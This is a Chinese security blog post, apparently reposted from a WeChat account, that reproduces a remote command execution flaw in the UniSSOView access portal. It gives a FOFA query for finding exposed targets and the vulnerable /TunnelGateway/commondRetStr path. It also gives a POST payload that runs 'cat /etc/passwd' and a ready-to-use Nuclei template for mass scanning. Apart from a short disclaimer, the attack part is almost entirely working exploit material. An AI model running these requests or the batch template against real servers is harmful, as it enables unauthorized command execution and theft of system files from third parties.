UniSSOView 任意命令执行复现

admin

102796
文章

87
评论

2023年10月13日21:21:15评论38 views字数 1289阅读4分17秒阅读模式

UniSSOView 任意命令执行复现

漏洞简介

联软科技安全准入门户平台 commondRetStr处存在远程代码执行漏洞，攻击者可以获取服务器权限。

漏洞复现

步骤一：使用以下Fofa语法进行资产搜索...并确定要攻击的资产目标！

# FOFA语法"UniSSOView"

步骤二：可在网址后面先拼接如下路径后回显以下页面则说明存在RCE漏洞...

# 拼接路径/TunnelGateway/commondRetStr

UniSSOView 任意命令执行复现

步骤三：使用Hackbar发起POST请求数据进行命令执行攻击测试....（备注：攻击测试目标较少）

shellCmd=cat /etc/passwd

UniSSOView 任意命令执行复现

漏洞批量

id: template-id
info:  name: Template Name  author: Ph9ar  severity: info  description: description  reference:    - https://  tags: tags
requests:  - raw:      - |-        POST /TunnelGateway/commondRetStr HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Upgrade-Insecure-Requests: 1        Sec-Fetch-Dest: document        Sec-Fetch-Mode: navigate        Sec-Fetch-Site: none        Sec-Fetch-User: ?1        Sec-Ch-Ua-Platform: "Windows"        Sec-Ch-Ua: "Google Chrome";v="103", "Chromium";v="103", "Not=A?Brand";v="24"        Sec-Ch-Ua-Mobile: ?0        Te: trailers        Connection: close        Content-Type: application/x-www-form-urlencoded        Content-Length: 24
        shellCmd=cat /etc/passwd
    matchers-condition: and    matchers:      - type: word        part: body        words:          - root      - type: status        status:          - 200

揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！！！！！

原文始发于微信公众号（揽月安全团队）：UniSSOView 任意命令执行复现

左青龙
微信扫一扫

右白虎
微信扫一扫

UniSSOView 任意命令执行复现

暗网简介：Molerats

kalilinux虚拟机安装完整过程

THM平台|Dogcat靶机记录

Hackerone 被黑，看我如何窃取你的POC！

【免杀】记一次lnk钓鱼小技巧

网络虚拟化技术：VXLAN，与VLAN有啥区别？

ARP:地址解析协议

[AI安全论文] (32)南洋理工大学刘杨教授——网络空间安全和AIGC整合之道学习笔记及强推（InForSec）

任意用户登录漏洞挖掘思路

AI安全白皮书 - 华为

发表评论

在线咨询

微信